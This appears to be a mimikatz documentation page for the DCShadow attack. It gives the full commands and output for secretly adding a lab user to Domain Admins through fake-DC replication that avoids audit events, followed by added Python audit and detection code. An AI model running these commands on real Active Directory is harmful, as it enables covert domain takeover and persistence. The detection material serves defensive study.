dcshadow
lsadump::dcshadow performs a DCShadow attack.
DCShadow is a feature of mimikatz located in the lsadump module. It makes the attacker's machine pose as a Domain Controller: it temporarily registers the host as a DC in the forest and serves the replication protocol that DCs use only among themselves (DRSUAPI over RPC), so that a legitimate DC pulls attacker-chosen attribute values from the fake DC as if they were ordinary replicated changes. Because the data arrives through replication rather than through an LDAP write, it does not produce the directory-modification events that most security controls and SIEM correlation rules key on; what remains observable is the registration itself (a server/nTDS-DSA object under the Sites container, replication SPNs on the computer account and a replica source being added and removed on the real DC), not the modified attribute. DCShadow shares some similarities with the DCSync attack (lsadump::dcsync), which reads replication data over the same interface. More information on DCShadow can be found at dcshadow.com.
Command-line argument(s) for the fake DC side (run as SYSTEM):
  • /kill: delete the object instead of modifying it
  • /object: the Distinguished Name (DN) of the Active Directory object to modify (a sAMAccountName such as optimus is also accepted and resolved to its DN, as in the example below)
  • /domain: the domain to target; defaults to the current domain
  • /dc: the FQDN of the domain controller that will pull the change
  • /attribute: the LDAP display name of the Active Directory schema attribute to modify (for example primaryGroupID)
  • /value: the value to write; its format depends on the attribute (an integer for primaryGroupID)
  • /replOriginatingUsn: the originating Update Sequence Number to stamp into the replication metadata of the change
  • /multiple: supply several values for a multi-valued attribute
  • /replOriginatingTime: the originating time to stamp into the replication metadata of the change (see dcshadow.com)
  • /replOriginatingUid: the DSA GUID of the domain controller to record as the originator of the change (see dcshadow.com)
Command-line argument(s) for the push side (run as Domain or Enterprise Admin):
  • /push: register the fake DC, trigger the replication and unregister it in one go
  • /stack: stack the change instead of serving it immediately, so that several changes are replicated in a single push
  • /schema: target the Active Directory schema partition (CN=Schema,CN=Configuration,...)
  • /config: target the Active Directory configuration partition (CN=Configuration,...)
  • /root: target the Active Directory root partition
  • /domain: the domain to target; defaults to the current domain
  • /dc: the FQDN of the domain controller that will pull the change
  • /computer: the FQDN of the computer to register as the fake DC; defaults to the computer on which DCShadow is executed
  • /viewstack: show the stacked changes that are going to be replicated
  • /clearstack: empty the stack
  • /manualregister: perform only the registration of the fake DC (server object, nTDS-DSA object and SPNs)
  • /manualunregister: perform only the unregistration of the fake DC
  • /manualpush: perform only the replication push, assuming the fake DC is already registered

Escalate a domain user

In the following example the low-privileged user hacklab.local\optimus is added to "Domain Admins" by setting its primaryGroupID attribute to 512, the RID of Domain Admins. Note that DCShadow is not a privilege escalation on its own: the push step requires Domain or Enterprise Admin rights. Its value is that the change reaches the DC as replicated data rather than as an audited directory write. Before the attack, optimus is only a member of Domain Users:
C:\Users>net user optimus /domain
User name                    optimus
Full Name                    optimus prime
Comment                      DCShadow ROCKS
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/31/2021 2:39:23 PM
Password expires             Never
Password changeable          11/1/2021 2:39:23 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   11/7/2021 3:32:28 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

Obtain debug privileges and elevate to SYSTEM

The fake DC's RPC server has to run as NT AUTHORITY\SYSTEM on the machine that will pose as a DC. From a command prompt opened as local administrator, enable SeDebugPrivilege and impersonate the SYSTEM token:
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

724     {0;000003e7} 1 D 43713      NT AUTHORITY\SYSTEM   S-1-5-18   (04g,21p)   Primary
 -> Impersonated !
 * Process Token : {0;0027cbc0} 2 F 3960324   hacklab\m3g9tr0n   S-1-5-21-2725560159-1428537199-2260736313-1730   (12g,24p)   Primary
 * Thread Token  : {0;000003e7} 1 D 28479033  NT AUTHORITY\SYSTEM   S-1-5-18   (04g,21p)   Impersonation (Delegation)

Modify the primary group ID

Still in the SYSTEM context, stage the change to replicate. mimikatz resolves optimus to its DN, checks the attribute against the schema, registers an RPC endpoint on the local machine (the "Fake Server", not yet registered in the directory) and then blocks, waiting for the legitimate DC to pull the change:
mimikatz # lsadump::dcshadow /object=optimus /attribute=primaryGroupID /value=512
** Domain Info **

Domain:        DC=hacklab,DC=local
Configuration: CN=Configuration,DC=hacklab,DC=local
Schema:        CN=Schema,CN=Configuration,DC=hacklab,DC=local
dsServiceName: ,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 80938

** Server Info **

Server: DC.hacklab.local
  InstanceId  : {34cb3b05-57f5-4699-b037-5795637d46bf}
  InvocationId: {34cb3b05-57f5-4699-b037-5795637d46bf}
Fake Server (not already registered): Win10.hacklab.local

** Attributes checking **

#0: primaryGroupID

** Objects **

#0: optimus
  DN:CN=optimus prime,CN=Users,DC=hacklab,DC=local
    primaryGroupID (1.2.840.113556.1.4.98-90062 rev 1):
      512
      (00020000)


** Starting server **

 > BindString[0]: ncacn_ip_tcp:Win10[53586]
 > RPC bind registered
 > RPC Server is waiting!
== Press Control+C to stop ==
  cMaxObjects : 1000
  cMaxBytes   : 0x00a00000
  ulExtendedOp: 0
  pNC->Guid: {9901d757-a63d-478f-a96a-f8be1a8308ac}
  pNC->Sid : S-1-5-21-2725560159-1428537199-2260736313
  pNC->Name: DC=hacklab,DC=local
SessionKey: c6aba9b6a2391d12b5f5b9b8c7cbf8d3cf0070202997d47aff1f96004638b815
1 object(s) pushed
 > RPC bind unregistered
 > stopping RPC server
 > RPC server stopped
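Why primaryGroupID=512 is enough, and why it is easy to miss, as an added example in Python (it is not part of the original page and not mimikatz code). In Active Directory an account belongs to its primary group through its own primaryGroupID attribute (a RID), not through the group's member attribute, so after the push above Domain Admins' member attribute still does not list optimus. The directory below is constructed sample data modelled on hacklab.local; the user DN and the domain SID are taken from the mimikatz output, everything else is assumed.

```python
"""Effective members of a privileged group, including primaryGroupID membership.

Added example (not from the original page or from mimikatz).  Shows what a
member-attribute-only enumeration returns versus the membership the DC actually
enforces, and an audit that flags users whose primary group is not Domain Users.
"""

DOMAIN_SID = "S-1-5-21-2725560159-1428537199-2260736313"   # pNC->Sid in the output above
DEFAULT_PRIMARY_GROUP_RID = 513                            # Domain Users
PRIVILEGED_GROUP_RIDS = {512: "Domain Admins", 519: "Enterprise Admins"}

DA_DN = "CN=Domain Admins,CN=Users,DC=hacklab,DC=local"
OPTIMUS_DN = "CN=optimus prime,CN=Users,DC=hacklab,DC=local"   # DN from the output above

# Constructed sample directory: DN -> attributes, as an LDAP search would return them.
# objectClass is simplified to a single value; real objects carry the whole class chain.
DIRECTORY = {
    DA_DN: {
        "objectClass": "group",
        "objectSid": f"{DOMAIN_SID}-512",
        "member": ["CN=Administrator,CN=Users,DC=hacklab,DC=local"],
    },
    "CN=Domain Users,CN=Users,DC=hacklab,DC=local": {
        "objectClass": "group",
        "objectSid": f"{DOMAIN_SID}-513",
        "member": [],   # never populated for accounts that hold it as primary group
    },
    "CN=Administrator,CN=Users,DC=hacklab,DC=local": {
        "objectClass": "user", "sAMAccountName": "Administrator", "primaryGroupID": 513,
    },
    OPTIMUS_DN: {   # state after the DCShadow push
        "objectClass": "user", "sAMAccountName": "optimus", "primaryGroupID": 512,
    },
    "CN=m3g9tr0n,CN=Users,DC=hacklab,DC=local": {
        "objectClass": "user", "sAMAccountName": "m3g9tr0n", "primaryGroupID": 513,
    },
}


def rid_of(sid: str) -> int:
    """Last sub-authority of a SID, e.g. S-1-5-21-...-512 -> 512."""
    return int(sid.rsplit("-", 1)[1])


def members_by_attribute(directory: dict, group_dn: str) -> set:
    """What a naive enumeration of the group's member attribute returns."""
    return set(directory[group_dn].get("member", []))


def members_by_primary_group(directory: dict, group_dn: str) -> set:
    """Accounts whose primaryGroupID equals the group's RID (implicit membership)."""
    rid = rid_of(directory[group_dn]["objectSid"])
    return {
        dn for dn, attrs in directory.items()
        if attrs.get("objectClass") == "user" and attrs.get("primaryGroupID") == rid
    }


def effective_members(directory: dict, group_dn: str) -> set:
    """Explicit plus primary-group members: the set the DC actually enforces."""
    return members_by_attribute(directory, group_dn) | members_by_primary_group(directory, group_dn)


def hidden_members(directory: dict, group_dn: str) -> set:
    """Members that only a primaryGroupID-aware enumeration reveals."""
    return effective_members(directory, group_dn) - members_by_attribute(directory, group_dn)


def audit_primary_groups(directory: dict) -> list:
    """Flag every user whose primary group is not the default (Domain Users, RID 513).

    Returns sorted (sAMAccountName, primaryGroupID, group name or None) tuples.  A RID
    that is neither the default nor a known privileged group is still reported, because
    a non-default primary group is unusual for a regular user account.
    """
    findings = []
    for attrs in directory.values():
        if attrs.get("objectClass") != "user":
            continue
        rid = attrs.get("primaryGroupID", DEFAULT_PRIMARY_GROUP_RID)
        if rid != DEFAULT_PRIMARY_GROUP_RID:
            findings.append((attrs["sAMAccountName"], rid, PRIVILEGED_GROUP_RIDS.get(rid)))
    return sorted(findings)


if __name__ == "__main__":
    print("member attribute only :", sorted(members_by_attribute(DIRECTORY, DA_DN)))
    print("effective members     :", sorted(effective_members(DIRECTORY, DA_DN)))
    for name, rid, group in audit_primary_groups(DIRECTORY):
        print(f"non-default primary group: {name} -> {rid} ({group or 'unknown'})")
```

The same logic applies to a real directory: query every user's primaryGroupID alongside the groups' member attribute, and treat any user whose primary group is not RID 513 as something to explain.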

Push the changes

The fake DC server above keeps waiting until the push happens. From a second command prompt running as Domain or Enterprise Admin, have mimikatz register the fake DC in the directory, ask the real DC to replicate from it, and unregister it again:
mimikatz # lsadump::dcshadow /push
** Domain Info **

Domain:        DC=hacklab,DC=local
Configuration: CN=Configuration,DC=hacklab,DC=local
Schema:        CN=Schema,CN=Configuration,DC=hacklab,DC=local
dsServiceName: ,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 80939

** Server Info **

Server: DC.hacklab.local
  InstanceId  : {34cb3b05-57f5-4699-b037-5795637d46bf}
  InvocationId: {34cb3b05-57f5-4699-b037-5795637d46bf}
Fake Server (not already registered): Win10.hacklab.local

** Performing Registration **

** Performing Push **

Syncing DC=hacklab,DC=local
Sync Done

** Performing Unregistration **
After a successful push the account is reported as a member of "Domain Admins". The membership is carried by the user's own primaryGroupID attribute (RID 512), not by the member attribute of the Domain Admins group, so enumeration that only reads member will not show it; net user lists the primary group among the global group memberships:
C:\Users\Administrator\Desktop\x64>net user optimus /domain
User name                    optimus
Full Name                    optimus prime
Comment                      DCShadow ROCKS
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/31/2021 2:39:23 PM
Password expires             Never
Password changeable          11/1/2021 2:39:23 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   11/7/2021 3:32:28 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Admins
The command completed successfully.
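The pushed attribute itself leaves no modification event on the real DC, but the registration and unregistration steps shown in the push output do. As an added example in Python (not part of the original page and not mimikatz code), the rules below look for those traces on the real DC: replication SPNs (GC/... and E3514235-4B06-11D1-AB04-00C04FC2DCD2/...) added to a computer account that is not a known DC (event 4742), a server or nTDSDSA object created under CN=Servers,CN=<site>,CN=Sites,CN=Configuration for an unknown server (event 5137, which requires directory service object-creation auditing), and a replica source established or removed for a naming context from a DSA that is not a known DC (events 4928/4929). The sample events are constructed in a flattened key/value shape: the field names are assumptions about how a log shipper renders the Security log, the fake DSA GUID is invented, and the known-DC values (DC.hacklab.local and its InstanceId) are taken from the mimikatz output above.

```python
"""Spotting the DC registration that DCShadow cannot avoid.

Added example, not from the original page or from mimikatz.  Runs three checks
over constructed Security-log-style events and returns the findings as
(EventID, identifier, reason) tuples.
"""
import re

DRS_SPN_GUID = "E3514235-4B06-11D1-AB04-00C04FC2DCD2"          # well-known DRS replication SPN class
KNOWN_DC_HOSTS = {"dc"}                                          # page: the only real DC is DC.hacklab.local
KNOWN_DC_DSA_GUIDS = {"34cb3b05-57f5-4699-b037-5795637d46bf"}    # InstanceId of DC in the output above
FAKE_DSA_GUID = "c1d2e3f4-0000-4000-8000-000000000001"           # constructed for the sample events

# Constructed events; Win10.hacklab.local is the "Fake Server" from the output above.
# Field names are assumptions about a flattened Security log export.
SAMPLE_EVENTS = [
    {"EventID": 4742, "TargetUserName": "WIN10$",
     "ServicePrincipalNames": ("HOST/Win10.hacklab.local; RestrictedKrbHost/Win10.hacklab.local; "
                               f"{DRS_SPN_GUID}/{FAKE_DSA_GUID}/hacklab.local; "
                               "GC/Win10.hacklab.local/hacklab.local")},
    {"EventID": 4742, "TargetUserName": "DC$",   # a real DC legitimately carries these SPNs
     "ServicePrincipalNames": ("HOST/DC.hacklab.local; "
                               f"{DRS_SPN_GUID}/34cb3b05-57f5-4699-b037-5795637d46bf/hacklab.local; "
                               "GC/DC.hacklab.local/hacklab.local")},
    {"EventID": 5137, "ObjectClass": "nTDSDSA",
     "ObjectDN": "CN=NTDS Settings,CN=Win10,CN=Servers,CN=hacklab-site,CN=Sites,CN=Configuration,DC=hacklab,DC=local"},
    {"EventID": 4928, "NamingContext": "DC=hacklab,DC=local",
     "SourceAddress": f"{FAKE_DSA_GUID}._msdcs.hacklab.local"},
    {"EventID": 4929, "NamingContext": "DC=hacklab,DC=local",
     "SourceAddress": f"{FAKE_DSA_GUID}._msdcs.hacklab.local"},
    {"EventID": 4928, "NamingContext": "CN=Configuration,DC=hacklab,DC=local",
     "SourceAddress": "34cb3b05-57f5-4699-b037-5795637d46bf._msdcs.hacklab.local"},   # known DC
    {"EventID": 4742, "TargetUserName": "WS01$", "ServicePrincipalNames": "HOST/WS01.hacklab.local"},
]

# Server objects live directly under CN=Servers,<site>,CN=Sites,CN=Configuration
SERVER_DN_RE = re.compile(r"CN=([^,]+),CN=Servers,CN=[^,]+,CN=Sites,CN=Configuration,", re.IGNORECASE)


def host_of_account(sam_account_name: str) -> str:
    """'WIN10$' -> 'win10'."""
    return sam_account_name.rstrip("$").lower()


def check_4742(ev: dict):
    """Replication SPNs (DRS class or GC/) appearing on a computer account that is not a DC."""
    spns = [s.strip() for s in ev["ServicePrincipalNames"].split(";")]
    suspicious = [s for s in spns
                  if s.upper().startswith(DRS_SPN_GUID + "/") or s.upper().startswith("GC/")]
    host = host_of_account(ev["TargetUserName"])
    if suspicious and host not in KNOWN_DC_HOSTS:
        return (4742, host, "replication SPNs on non-DC account: " + ", ".join(suspicious))
    return None


def check_5137(ev: dict):
    """A server or nTDSDSA object created in the Sites container for an unknown server name."""
    match = SERVER_DN_RE.search(ev["ObjectDN"])
    if ev["ObjectClass"].lower() in ("ntdsdsa", "server") and match:
        server = match.group(1).lower()
        if server not in KNOWN_DC_HOSTS:
            return (5137, server, f"{ev['ObjectClass']} object created for unknown server")
    return None


def check_replica_source(ev: dict):
    """Replica source established (4928) or removed (4929) from a DSA GUID that is not a known DC."""
    dsa_guid = ev["SourceAddress"].split(".", 1)[0].lower()
    if dsa_guid not in KNOWN_DC_DSA_GUIDS:
        verb = "established" if ev["EventID"] == 4928 else "removed"
        return (ev["EventID"], dsa_guid, f"replica source {verb} for {ev['NamingContext']} from unknown DSA")
    return None


CHECKS = {4742: check_4742, 5137: check_5137, 4928: check_replica_source, 4929: check_replica_source}


def detect_dcshadow(events: list) -> list:
    """Apply the per-event-ID checks and collect the findings in log order."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        hit = check(ev) if check else None
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for event_id, ident, reason in detect_dcshadow(SAMPLE_EVENTS):
        print(f"[{event_id}] {ident}: {reason}")
```

The known-DC allow-lists are the whole point: every one of these artifacts is normal for a real DC, so the detection is "DC-only behaviour from a host that is not a DC". The 4928/4929 pair bracketing a short window, with the same unknown source DSA, is the closest thing to a direct signature of the push itself.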